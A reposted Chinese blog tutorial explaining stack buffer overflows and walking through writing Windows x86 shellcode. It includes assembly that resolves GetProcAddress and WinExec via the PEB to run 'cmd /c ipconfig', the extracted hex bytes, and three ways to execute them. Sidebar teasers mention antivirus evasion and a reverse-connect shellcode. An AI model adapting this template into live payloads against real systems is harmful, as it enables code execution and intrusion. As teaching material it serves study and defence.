Shellcode的原理及编写http://blog.csdn.net/maotoula/article/details/18502679

最新推荐文章于 2024-06-18 21:15:19 发布
最新推荐文章于 2024-06-18 21:15:19 发布
阅读量514 收藏
点赞数
分类专栏: 安全

转自 http://blog.csdn.net/maotoula/article/details/18502679


1.shellcode原理

Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务的。 Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰盛的晚餐。漏洞利用中最关键的是Shellcode的编写。由于漏洞发现者在漏洞发现之初并不会给出完整Shellcode,因此掌握Shellcode编写技术就显得尤为重要。

如下链接是shellcode编写的基础,仅供参考

 http://blog.chinaunix.NET/uid-24917554-id-3506660.html

缓冲区溢出的shellcode很多了,这里重现下缓冲区溢出。

[cpp]  view plain  copy
  在CODE上查看代码片 派生到我的代码片
  1. int fun(char *shellcode)  
  2. {  
  3.     char str[4]="";//这里定义4个字节  
  4.     strcpy(str,shellcode);//这两个shellcode如果超过4个字节,就会导致缓冲区溢出  
  5.     printf("%s",str);  
  6.     return 1;  
  7. }  
  8. int main(int argc, char* argv[])  
  9. {  
  10.   char str[]="aaaaaaaaaaaaaaaaaaa!";  
  11.   fun(str);  
  12.   return 0;  
  13. }  
如上程序,会导致缓冲区溢出。

程序运行后截图如下

如上可以看出来,异常偏移是61616161,其实自己观察61616161其实就是aaaa的Hex编码

因为调用函数的过程大致是
1:将参数从右到左压入堆栈
2:将下一条指令的地址压入堆栈
3:函数内部的临时变量申请
4:函数调用完成,退出
内存栈区从高到低

[参数][ebp][返回地址][函数内部变量空间]
如上程序,如果函数内部变量空间比较小,执行strcpy时候,源字符串比目标字符串长,就会覆盖函数返回地址,导致程序流程变化

如图


0048FE44前四个00是str申请的四个字节的并初始化为00,后面的48FF1800是函数的返回地址,再后面的411E4000是ebp,既调用函数的基址。

再往下执行strcpy函数后,可以看见aaaaaaaa覆盖了返回地址

如图


可以看见0018FF44地址后面的函数返回地址和ebp都被61填充了。

fun函数执行完后,返回调用fun函数地址时候,导致程序报错。

缓冲区溢出的简单讲解如上,这时候,如果我们把返回地址改成我们自己的函数地址,不就可以执行我们自己的程序了?

缓冲区溢出利用就是把返回地址改成我们自己的函数地址,上面的方法就是覆盖eip,既返回地址,还有一种方法是覆盖SHE,原理差不多。

了解了基本原理,下面可以编写利用的代码

缓冲区溢出,基本的使用方法是jmp esp,覆盖的eip指针是jmp esp的地址,利用的字符串结构如下

[正常的字符串][jmp esp的地址][执行的代码(shellcode)]

关于获取jmp esp的代码,可以自己写个程序,从系统中查找jmp esp代码0xFFE4。

下面开始编写shellcode以及调用实现

[cpp]  view plain  copy
  在CODE上查看代码片 派生到我的代码片
  1. void fun()  
  2. {  
  3.     __asm  
  4.     {  
  5.      mov eax, dword ptr fs:[0x30];  
  6.      mov eax, dword ptr [eax+0xC];  
  7.      mov eax, dword ptr [eax+0xC];  
  8.      mov eax, dword ptr [eax];  
  9.      mov eax, dword ptr [eax];  
  10.      mov eax, dword ptr [eax+0x18];  
  11.      mov ebp,eax                        //Kernel.dll基址  
  12.      mov eax,dword ptr ss:[ebp+3CH]      // eax=PE首部  
  13.      mov edx,dword ptr ds:[eax+ebp+78H]  //  
  14.      add edx,ebp                        // edx=引出表地址  
  15.      mov ecx,dword ptr ds:[edx+18H]      // ecx=导出函数个数,NumberOfFunctions  
  16.      mov ebx,dword ptr ds:[edx+20H]      //  
  17.      add ebx,ebp                        // ebx=函数名地址,AddressOfName  
  18. start:                                  //  
  19.      dec ecx                            // 循环的开始  
  20.      mov esi,dword ptr ds:[ebx+ecx*4]   //  
  21.      add esi,ebp                        //  
  22.      mov eax,0x50746547                   //  
  23.      cmp dword ptr ds:[esi],eax         // 比较PteG  
  24.      jnz start                     //  
  25.      mov eax,0x41636F72                   //  
  26.      cmp dword ptr ds:[esi+4],eax       // 比较Acor,通过GetProcA几个字符就能确定是GetProcAddress  
  27.      jnz start                     //  
  28.      mov ebx,dword ptr ds:[edx+24H]      //  
  29.      add ebx,ebp                        //  
  30.      mov cx,word ptr ds:[ebx+ecx*2]     //  
  31.      mov ebx,dword ptr ds:[edx+1CH]      //  
  32.      add ebx,ebp                        //  
  33.      mov eax,dword ptr ds:[ebx+ecx*4]   //  
  34.      add eax,ebp                        // eax 现在是GetProcAddress地址  
  35.      mov ebx,eax                        // GetProcAddress地址存入ebx,如果写ShellCode的话以后还可以继续调用  
  36.      push 0                             //  
  37.      push 0x636578                        //  
  38.      push 0x456E6957                      // 构造WinExec字符串  
  39.      push esp                           //  
  40.      push ebp                           // ebp是kernel32.dll的基址   
  41.      call ebx                           // 用GetProcAdress得到WinExec地址  
  42.      mov ebx,eax                        // WinExec地址保存到ecx  
  43.    
  44.      push 0x00676966  
  45.      push 0x6E6F6370  
  46.      push 0x6920632F  
  47.      push 0x20646d63    //cmd压入栈  
  48.   
  49.      lea eax,[esp];     //取到cmd首地址  
  50.      push 1             //  
  51.      push eax           // ASCII "cmd /c ipconfig"  
  52.      call ebx           // 执行WinExec  
  53.     // leave            // 跳回原始入口点  
  54.     }  
  55. }  

[cpp]  view plain  copy
  在CODE上查看代码片 派生到我的代码片
  1. int main(int argc, char* argv[])  
  2. {  
  3.    fun();  
  4. }  


如果汇编代码在vc调试下,获取二进制代码如图:


查看00401A08的地址,可以看出是fun函数的汇编代码

shellcode代码基本获取到了,现在是要把他复制出来,

我取出来的后,如下

[cpp]  view plain  copy
  在CODE上查看代码片 派生到我的代码片
  1. unsigned char shellcode[]={  
  2.     0x64,0xA1,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,0x00,0x8B,0x40,0x18,0x8B,0xE8,0x36,0x8B,0x45,  
  3.     0x3C,0x3E,0x8B,0x54,0x28,0x78,0x03,0xD5,0x3E,0x8B,0x4A,0x18,0x3E,0x8B,0x5A,0x20,0x03,0xDD,0x49,0x3E,0x8B,0x34,0x8B,0x03,  
  4.     0xF5,0xB8,0x47,0x65,0x74,0x50,0x3E,0x39,0x06,0x75,0xEF,0xB8,0x72,0x6F,0x63,0x41,0x3E,0x39,0x46,0x04,0x75,0xE4,0x3E,0x8B,  
  5.     0x5A,0x24,0x03,0xDD,0x66,0x3E,0x8B,0x0C,0x4B,0x3E,0x8B,0x5A,0x1C,0x03,0xDD,0x3E,0x8B,0x04,0x8B,0x03,0xC5,0x8B,0xD8,0x6A,  
  6.     0x00,0x68,0x78,0x65,0x63,0x00,0x68,0x57,0x69,0x6E,0x45,0x54,0x55,0xFF,0xD3,0x8B,0xD8,0x68,0x66,0x69,0x67,0x00,0x68,0x70,  
  7.     0x63,0x6F,0x6E,0x68,0x2F,0x63,0x20,0x69,0x68,0x63,0x6D,0x64,0x20,0x8D,0x04,0x24,0x6A,0x01,0x50,0xFF,0xD3};  

稍作了下加工,0x是HEX的方式。

下面是我们调用shellcode,看是否可以用

程序如下:

[cpp]  view plain  copy
  在CODE上查看代码片 派生到我的代码片
  1. int main(int argc, char* argv[])  
  2. {  
  3.     unsigned char shellcode[]={  
  4.     0x64,0xA1,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,0x00,0x8B,0x40,  
  5.     0x18,0x8B,0xE8,0x36,0x8B,0x45,0x3C,0x3E,0x8B,0x54,0x28,0x78,0x03,0xD5,0x3E,0x8B,0x4A,0x18,  
  6.     0x3E,0x8B,0x5A,0x20,0x03,0xDD,0x49,0x3E,0x8B,0x34,0x8B,0x03,0xF5,0xB8,0x47,0x65,0x74,0x50,  
  7.     0x3E,0x39,0x06,0x75,0xEF,0xB8,0x72,0x6F,0x63,0x41,0x3E,0x39,0x46,0x04,0x75,0xE4,0x3E,0x8B,  
  8.     0x5A,0x24,0x03,0xDD,0x66,0x3E,0x8B,0x0C,0x4B,0x3E,0x8B,0x5A,0x1C,0x03,0xDD,0x3E,0x8B,0x04,  
  9.     0x8B,0x03,0xC5,0x8B,0xD8,0x6A,0x00,0x68,0x78,0x65,0x63,0x00,0x68,0x57,0x69,0x6E,0x45,0x54,  
  10.     0x55,0xFF,0xD3,0x8B,0xD8,0x68,0x66,0x69,0x67,0x00,0x68,0x70,0x63,0x6F,0x6E,0x68,0x2F,0x63,  
  11.     0x20,0x69,0x68,0x63,0x6D,0x64,0x20,0x8D,0x04,0x24,0x6A,0x01,0x50,0xFF,0xD3};  
  12.     //三种方式执行shellcode  
  13.     //第一种  
  14.     ((void (*)())&shellcode)(); // 执行shellcode  
  15.     //第二种  
  16.     __asm     
  17.    {     
  18.       lea eax,shellcode;     
  19.       jmp eax;     
  20.    }   
  21.    //第三种  
  22.     __asm  
  23.    {  
  24.       lea eax, shellcode  
  25.       push eax  
  26.       ret   
  27.    }  
  28. }  

至此,shellcode的编写完成了,如上这只是shellcode大致编写过程,是在windows下环境编写的,linux环境下的编写过程基本相同

至于更高级的利用,可以去看雪论坛逛逛。

ncafei
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Shellcode
weixin_43916678的博客
07-07 8939
shellcode简介 shellcode是一段用于利用软件漏洞而执行的代码,也可以认为是一段填充数据,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 下面这张图就是shellcode工作流程,从功能上看,shellcode在整个漏洞利用过程中发挥主要作用就是对计算机端的控制。 shellcode可以按照攻击者执行的位置分为本地s
Delphi编写本地溢出反向连接通用ShellCode
01-13
{ SinDoor One By Anskya Email:Anskya@Gmail.com Web:Www.Anskya.Net QQ:115447 说明:打开NC监听本地8848端口~运行程序返回一个Shell,本程序ShellCode:是通用ShellCode..内部镶有API搜索引擎和数据代码融合(很简单的技术,病毒和ShellCode都用得到),有兴趣大家自己用Debug跟一下我就不对说了... 感谢zhengxi's Crc32函数,Vecna API函数搜索引擎和29A的病毒杂志,还有pker的~API搜索引擎范例。--我没有使用ShellCode变型都是原始代码。 为了偷懒就把以前写的System.pas直接拿来用了,System.pas中包含的API搜索引擎在这里没有使用,紧紧是为了引用ExitProcess函数而已. ShellCode部分可以在VC下编写然后提取 ( 小弟是用TASM直接编写用16进制编辑器直接提取.. 关于ShellCode的提取参考可以参考..《C语言直接编写ShellCode》或者就用VC边写边翻译吧。^_^·力气活 ) 本程序仅仅为了演示~Delphi编写ShellCode的示例并没有其他意图}翻译《缓冲区溢出教程》时候的一个小例子。现在身体不行了·也不能写了,索性整理一下发布好了~~大家看一下就知道了,仅仅是个例子.
【网络资源学习笔记】ShellCode相关内容学习
天在等我,菜鸟想飞
07-14 2543
个人shellcode相关网络资源学习记录
Shellcode详解
最新发布
N阶二进制的博客
06-18 1534
Shellcode是一种小巧、紧凑的机器代码,通常用于利用软件漏洞或注入攻击中。其名称来源于早期的黑客技术,其中的代码通常会启动一个命令行shell(如Bash或cmd),因此称为“shellcode”。不过,现在shellcode不仅仅用于启动shell,还可以执行各种恶意活动,如下载并执行恶意软件、修改系统设置等。
免杀入门---shellcode免杀
LvHLong的博客
05-03 5481
前言 本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 基础概念 免杀 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。 杀毒软件工作原理 市面上的杀毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
一篇文章彻底清楚shellcode(精品)
weixin_51055545的博客
03-08 8966
shellcode 类题目 文章目录shellcode 类题目1.没开沙箱(此时我们可以系统调用get shell)picoctf_2018_shellcodemrctf2020_shellcode2.开启沙箱(orw读flag)gwctf_2019_shellcode 1.没开沙箱(此时我们可以系统调用get shell) (一)32位程序系统调用 32位程序有别于64位程序,32位通过栈传参,我们常用的寄存器有4个数据寄存器(eax,ebx,ecx,edx),2个变址寄存器(esi,edi),2个指针寄
Shellcode编译器-C/C++开发
05-26
Shellcode编译器Shellcode Compiler是一个程序,可将C / C ++样式代码编译成一个小的,与位置无关且没有NULL的Shellcode,适用于Windows(x86和x64)和Linux(x86和x64)。 可以调用任何Windows AP Shellcode编译器...
C ++完全未检测到的Shellcode启动器;)-C/C++开发
05-27
c ++完全未检测到的shellcode启动器;)夏洛特c ++完全未检测到的shellcode启动器;)发行此版本以庆祝我的新生描述c ++ shellcode的启动器的诞生,截至2021年5月13日,完全未检测到0/26。和函数名称在Kali Linux上...
快速将Windows动态链接库转换为ShellCode-C/C++开发
05-26
DllToShellCode快速转换Windows动态链接库到ShellCode功能支持32位和64位支持压缩(使用ntdll RtlCompressBuffer函数或aplib)支持两种模式Direc DllToShellCode快速转换Windows动态链接库到ShellCode功能支持32位和...
通过回调执行其他Shellcode-C/C++开发
05-27
替代代码执行这种方法的受欢迎程度超出了预期,因此我只是想对alfarom256进行喊叫,以便向我介绍cal替代代码执行这种方法的受欢迎程度超过了预期,因此我只是想对alfarom256进行喊叫,以通知我关于回调函数,并向我...
快速调试在恶意软件分析过程中提取的Shellcode-C/C++开发
05-26
BlobRunner BlobRunner是一个简单的工具,用于快速调试在恶意软件分析过程中提取的shellcode。 BlobRunner为目标文件分配内存,并跳转到已分配内存的基数(或偏移量)。 这允许进行分析BlobRunner BlobRunner是一个...
威胁分析与响应能力—Shellcode分析与检测技巧
qq_44005305的博客
08-30 982
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。
Shellcode原理编写
热门推荐
maotoula的专栏
01-19 6万+
1.shellcode原理
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1275
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
免杀专题(一)shellcode原理
weixin_47224111的博客
12-30 3809
免杀专题(一)shellcode原理 基本概念 一段16进制的机器码,可在暂存器eip溢出后,塞入一段可让cpu执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 原理 因为shellcode一般为一段汇编代码,不依赖任何编译环境,也不能像编写代码一样,调用api函数名称来实现功能。它通过主动查找dll基址并动态获取api地址的方式来实现api调用。 Kernel32.dll控制着系统的内存管理、数据的输入输出操作和中断处理。 shellcode分为两个模块,基本模块和功能模块 基本模块 用
shellCode免杀技巧
qq_39330735的博客
05-15 2314
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
ShellCode原理以及编写
qq_18811919的博客
07-02 2855
0x0 ShellCode编写注意事原理 1)不能使用字符串的直接偏移 即使你在C/C++代码中定义一个全局变量,一个取值为“Hello world”的字符串,或直接把该字符串作为参数传递给某个函数。但是,编译器会把字符串放置在一个特定的Section中(如.rdata或.data)。 2)不能确定函数的地址(如printf) 在shellcode中,我们却不能以逸待劳了。因为我们无法确定包含所需函数的DLL文件是否已经加载到内存。受ASLR(地址空间布局随机化)机制的影响,系统不会每次都把DLL文件加载
shellcode
赵花花08042的博客
01-28 4114
https://www.bilibili.com/video/BV1y4411k7ch/?spm_id_from=333.788.recommend_more_video.3 什么是shellcode? 通常情况下,编写代码生成pe文件(即exe文件)(运行所需的宿主 意思就是,需要先运行exe) 而shellcode,不被包装在pe中,以二进制的方式存放到 举例:实现弹窗提示功能 编译后,运行生成的exe文件,弹出框 把代码中的核心代码MassegeBOX提取出来就是shellcode 通过特殊处
网络攻防技术——shellcode编写
学习记录
02-27 3190
一、题目 shellcode广泛用于许多涉及代码注入的攻击中。编写shellcode是相当有挑战性的。虽然我们可以很容易地从互联网上找到现有的shellcode,但是能够从头开始编写我们自己的shellcode总是令人兴奋的。shellcode中涉及到几种有趣的技术。本实验室的目的是帮助学生理解这些技术,以便他们能够编写自己的shellcode编写shellcode有几个挑战,一个是确保二进制文件中没有0x00,另一个是找出命令中使用的数据的地址。第一个挑战不是很难解决,有几种方法可以解决它。第二个挑战
shellcode是什么
07-25
- *1* *3* [【转载】shellcode介绍](https://blog.csdn.net/qq_44108455/article/details/104246572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值